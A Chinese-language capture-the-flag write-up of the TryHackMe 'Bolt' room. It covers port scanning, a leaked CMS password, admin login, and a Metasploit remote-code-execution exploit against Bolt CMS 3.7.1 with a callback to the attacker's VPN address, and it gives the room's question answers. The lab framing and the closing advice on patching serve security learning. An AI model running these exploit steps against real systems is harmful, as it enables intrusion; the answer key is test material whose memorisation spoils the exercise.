今天再來試玩一個 Try Hack Me 上面的簡單題目，攻打一個 CMS (Content Management System ) 的服務。

• 網址 : https://tryhackme.com/room/bolt
• IP : 10.10.51.13

掃 Port

• 如同先前的起手式一樣
  • 先透過 rustscan 掃描，再透過 nmap 掃描
• rustscan -a 10.10.51.13
  • 
  • 發現有開 3 個 Port
    • 22
    • 80
    • 8000
• nmap -A -p22,80,8000 10.10.51.13
  • 

觀察網頁

• 它有開兩個網頁的 Port
  • 80
    • 80 port 看起來是一個預設的 apache 頁面
    • 
  • 8080
    • 8080 port 看起來是一個 Bolt 的頁面
    • 
• Question : What port number has a web server with a CMS running?
  • 8000
• Question : What is the username we can find in the CMS?
  • 在這個 Blog 上，我們可以看到使用者的帳號叫做 bolt
• 我們也可以發現在 Po 文的地方找到
  • 
  • 它很 87 的把自己的密碼 Po 在上面
    • 不要覺得這在真實世界上不可能發生
    • 真實世界上真的很常出現這種事 XD
• Question : What is the password we can find for the username?
  • boltadmin123

進入後台

• 網路上找到 Bolt 後臺網址
  • http://10.10.51.13:8000/bolt/login
  • 
  • 並成功地使用帳密進行登入
• Question : What version of the CMS is installed on the server? (Ex: Name 1.1.1)
  • Bolt 3.7.1
  • 上一張截圖最下面有寫
  • 而這個版本在網路上搜尋，可以找到有 RCE 的漏洞

Exploit

• 今天來使用 Metasploit 進行攻擊
  • 首先輸入 msfconsole 進入 metasploit
• 我們來搜尋
  • search bolt
    • 
    • 找到了編號為 0 的 RCE 的漏洞
• 使用 編號 0 的漏洞
  • use 0
• 觀察需要設定的參數
  • show options
  • 會回傳 PASSWORD , USERNAME , RHOSTS , LHOST 等必填欄位
• 設定密碼
  • set PASSWORD password
• 設定各種參數
  • set USERNAME bolt
  • set RHOSTS 10.10.51.13
  • set LHOST tun0
    • tun0 代表我使用網卡代號 tun0 的 IP (VPN)
• 再次觀察參數
  • show options
  • 
  • 確認該填的東西都填好了!!
• 執行腳本
  • exploit
    • 
• 成功 RCE
  • 可以執行任意指令，例如 ls
  • 
• 也能順利取得 flag
  • 

心得

這個題目告訴了我們，網頁不一定開在 80 / 443 Port；我們可以透過 CMS 上面的蛛絲馬跡尋找帳號跟密碼的線索；不要耍白ㄘ的把密碼給 Po 到網路上。再來就是可以透過網路上的資源尋找後台、版本等；待蒐集完備後，就可以開始尋找攻擊方式。今天與昨天的內容都提醒了我們，當軟體有重大更新時，一定要馬上的做更新，以避免攻擊。